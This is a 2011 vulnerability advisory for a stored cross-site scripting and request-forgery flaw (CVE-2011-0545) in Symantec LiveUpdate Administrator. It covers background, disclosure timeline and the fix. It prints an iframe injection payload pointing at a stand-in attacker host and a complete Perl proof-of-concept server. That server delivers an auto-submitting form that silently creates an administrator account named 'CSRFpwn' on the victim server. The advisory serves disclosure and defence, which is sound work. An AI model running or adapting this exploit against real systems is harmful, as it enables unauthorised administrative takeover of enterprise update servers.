Symantec LiveUpdate Administrator Cross Site Request Forgery

`______________________________________________________________________  
  
NSOADV-2011-001: Symantec LiveUpdate Administrator CSRF vulnerability  
______________________________________________________________________  
______________________________________________________________________  
  
111101111  
11111 00110 00110001111  
111111 01 01 1 11111011111111  
11111 0 11 01 0 11 1 1 111011001  
11111111101 1 11 0110111 1 1111101111  
1001 0 1 10 11 0 10 11 1111111 1 111 111001  
111111111 0 10 1111 0 11 11 111111111 1 1101 10  
00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100  
10111111 0 01 0 1 1 111110 11 1111111111111 11110000011  
0111111110 0110 1110 1 0 11101111111111111011 11100 00  
01111 0 10 1110 1 011111 1 111111111111111111111101 01  
01110 0 10 111110 110 0 11101111111111111111101111101  
111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111  
111110110 10 0111110 1 0 0 1111111111111111111111111 110  
111 11111 1 1 111 1 10011 101111111111011111111 0 1100  
111 10 110 101011110010 11111111111111111111111 11 0011100  
11 10 001100 0001 111111111111111111 10 11 11110  
11110 00100 00001 10 1 1111 101010001 11111111  
11101 0 1011 10000 00100 11100 00001101 0  
0110 111011011 0110 10001 101 11110  
1011 1 10 101 000001 01 00  
1010 1 11001 1 1 101 10  
110101011 0 101 11110  
110000011  
111  
______________________________________________________________________  
______________________________________________________________________  
  
Title: Symantec LiveUpdate Administrator CSRF  
vulnerability  
Severity: Medium  
Advisory ID: NSOADV-2011-001  
Found Date: 14.07.2010  
Date Reported: 17.01.2011  
Release Date: 22.03.2011  
Author: Nikolas Sotiriu  
Mail: nso-research at sotiriu.de  
Website: http://sotiriu.de/  
Twitter: http://twitter.com/nsoresearch  
Advisory-URL: http://sotiriu.de/adv/NSOADV-2010-001.txt  
Vendor: Symantec (http://www.symantec.com/)  
Affected Products: Symantec LiveUpdate Administrator <= 2.2.2.9  
Remote Exploitable: Yes  
Local Exploitable: No  
CVE-ID: CVE-2011-0545  
Patch Status: Vendor released an patch  
Discovered by: Nikolas Sotiriu  
Disclosure Policy: http://sotiriu.de/policy.html  
Thanks to: Thierry Zoller: For the permission to use his  
Policy  
  
  
  
Background:  
===========  
  
The Symantec LiveUpdate Administrator is an enterprise Web application  
that allows you to manage Symantec updates on multiple internal Central  
LiveUpdate servers, called Distribution Centers. Using the Symantec  
LiveUpdate Administrator, you download updates to the Manage Updates  
folder, and then publish the updates to production distribution servers  
for LiveUpdate clients to download, or to testing distribution centers,  
so that the updates can be tested before they are published to production.  
  
You can download and publish updates on schedule, allowing you to create  
a low maintenance, reliable system that can be set up once, and then run  
automatically. Updates can also be manually downloaded and published as  
needed.  
  
(Product description from LUA Admin Guide)  
  
  
  
Description:  
============  
  
The webfrontend do not properly sanitize some variables before being  
returned to the user.  
  
If an attacker supplies a username, containing script code, at the  
login-page of the service, an entry in the Event Log is done, containing  
the "user name".  
  
If the admin user is viewing the logfile, the script code will be  
executed.  
  
This can be exploited to execute arbitrary HTML and script code in a  
admin's browser session in context of the Web Administrator frontend.  
  
If an attacker passes a user name like  
  
<iframe src=http://attacker/evil.html>  
  
in the username field he can execute CSRF attacks against the  
Webfrontend to change the settings.  
  
The Proof of Concept code addes an admin account or executes an alert box.  
  
  
  
  
Proof of Concept :  
==================  
  
#!/usr/bin/perl  
  
##  
# Title: Symantec Live Update Administrator CSRF Exploit  
# Name: luaCSRF.pl  
# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>  
#  
# Use it only for education or ethical pentesting! The author accepts  
# no liability for damage caused by this tool.  
#  
##  
  
  
use Socket;  
use IO::Handle;  
use Getopt::Std;  
  
my %args;  
getopt('g:h:', \%args);  
  
my $payload = $args{g} || usage();  
my $victim = $args{h} || usage();  
  
banner();  
  
if ($payload eq "1") {  
print "[+] Using the Alert Box payload\n";  
# Alert Box  
$html = <<ENDHTML;  
<html>  
<SCRIPT LANGUAGE="JavaScript">alert('!!!XSS/CSRF vulnerability!!!')</SCRIPT>  
</html>  
  
ENDHTML  
  
} elsif ($payload eq "2") {  
print "[+] Using the add admin user payload\n";  
# Adds the user CSRFpwn with password 12345678  
$html = <<ENDHTML;  
<html>  
<body onload="document.csrf.submit();">  
<form name="csrf" action="http://$victim:7070/lua/adduser.do" method="post">  
<input type="hidden" name="dispatch" value="save" />  
<input type="hidden" name="username" value="CSRFpwn" />  
<input type="hidden" name="password" value="12345678"/>  
<input type="hidden" name="verifyPassword" value="12345678"/>  
<input type="hidden" name="lastname" value="junk" />  
<input type="hidden" name="firstname" value="junk" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="userRole" value="1" />  
</form>  
</body>  
</html>  
  
ENDHTML  
  
}  
  
my $protocol = getprotobyname('tcp');  
  
socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "[-] socket() failed: $!";  
setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "[-] Can't set SO_REUSEADDR: $!";  
my $my_addr = sockaddr_in(80,INADDR_ANY);  
bind(SOCK,$my_addr) or die "[-] bind() failed: $!";  
listen(SOCK,SOMAXCONN) or die "[-] listen() failed: $!";  
warn "[+] waiting for incoming connections on port 80...\n";  
warn "[+] Enter the following String in the LUA username login field\n";  
warn "[+] (e.q. HTTP/SSH) and wair for the admin to view the Logs\n";  
warn "[+]\n";  
warn "[+] <frame src=http://<LOCAL_ADDRESS>/.html>\n";  
  
$repeat = 1;  
$victim = inet_aton("0.0.0.0");  
while($repeat) {  
my $remote_addr = accept(SESSION,SOCK);  
my ($port,$hisaddr) = sockaddr_in($remote_addr);  
warn "[+] Connection from [",inet_ntoa($hisaddr),",$port]\n";  
$victim = $hisaddr;  
SESSION->autoflush(1);  
if(<SESSION>) {  
print SESSION $http_header . $html;  
}  
warn "[+] Connection from [",inet_ntoa($hisaddr),",$port] finished\n";  
close SESSION;  
}  
  
sub usage {  
print $payload;  
print "\n";  
print " luaCSRF.pl - Symantec LUA CSRF Exploit\n";  
print "===============================================================\n\n";  
print " Usage:\n";  
print " $0 -g <payload> -h <lua-ip>\n";  
print " Optional:\n";  
print " -p <local port to listen on>\n";  
print " -g (1|2) <payload to use>\n";  
print " 1 <Execute an alert box\n";  
print " 2 <Add the Admin User \"CSRFpwn\">\n";  
print " Notes:\n";  
print " -nothing here\n";  
print "\n";  
print " Author:\n";  
print " Nikolas Sotiriu (lofi)\n";  
print " url: www.sotiriu.de\n";  
print " mail: lofi[at]sotiriu.de\n";  
print "\n";  
  
  
exit(1);  
}  
  
sub banner {  
print STDERR << "EOF";  
--------------------------------------------------------------------------------  
luaCSRF.pl - Symantec LUA CSRF Exploit  
--------------------------------------------------------------------------------  
  
111 1111111  
11100 101 00110111001111  
11101 11 10 111 101 1001111111  
1101 11 00 10 11 11 111 1111111101  
10111 1 10 11 10 0 10 1 1 1 1111111011  
1111 1 1 10 0 01 01 01 1 1 111 1111011101  
1000 0 11 10 10 0 10 11 111 11111 11 1111 111100  
1111111111 01 10 10 11 01 0 11 11111111111 1 1111 11  
10111110 0 01 00 11 1110 11 10 11111111111 11 11111 11 111  
101111111 0 10 01 11 1 11 0 10 11 1111111111111111 1111110000111  
011111 0110 10 10 0 11 1 11 01 01 111111111111111 1 11110011001  
1011111 0110 10 11 1110 11 1 10 11111111111111111111 1 100 001  
1011111 0 10 10 01 1 0 1 11 1 111111111111111111111111 001101  
011111 0 0 0 11 0 1111 0 11 01111111111111111111111111 01  
1111111 01 01 111 1 1111 1 11 1111111111111111111111 1101 1111  
111 1111 10 0 111110 0111 0 1 0111111111111111111111 11111 1111  
111 11111 1 11 1 1 1 111 11 11111111111111111111111110 1001  
111 1011111 1 11111111110111111111111111111111111111111 01 10111001  
11 1100 10110110 10001 11101111111111111111 10 111 11100  
111 00 1011101 00101 0 11111111111111111001 11 111101  
11 00 00 101 1000011 1011 1111 1111111000 1111111 0  
11 00 0 1011 100001 101000 1 1001 00001111 01  
01101 11111 1011 01100 0101 110 11 10  
10111 1 0 01 0000011 10 10  
10011 11100 1111 101 11  
1110 01 101011 1001100  
1111000011 1 111  
11000001111  
1  
  
EOF  
}  
  
  
  
  
Solution:  
=========  
  
Update to Version 2.3  
  
Symantec Security Advisory: http://tinyurl.com/4oox6hy  
  
  
  
Disclosure Timeline (YYYY/MM/DD):  
=================================  
  
2010.07.14: Vulnerability found  
2011.01.17: Sent PoC, Advisory, Disclosure policy and planned disclosure  
date (2011.02.04) to Vendor  
2011.01.17: Vendor response  
2011.01.20: Symantec product team verifies the finding  
2011.02.03: Ask for a status update  
2011.02.03: Symantec Security Response Team informs me that the update  
is planned for early to mid-March.  
2011.02.03: Changed release date to 2011.03.10.  
2011.03.03: Symantec Security Response Team informs me that the update  
is planned for 2011.03.17.  
2011.03.17: Symantec Security Response Team informs me that the update  
QA needs a bit more time.  
2011.03.21: Update and Security Advisory release.  
2011.03.22: Release of this Advisory  
  
  
  
  
  
  
`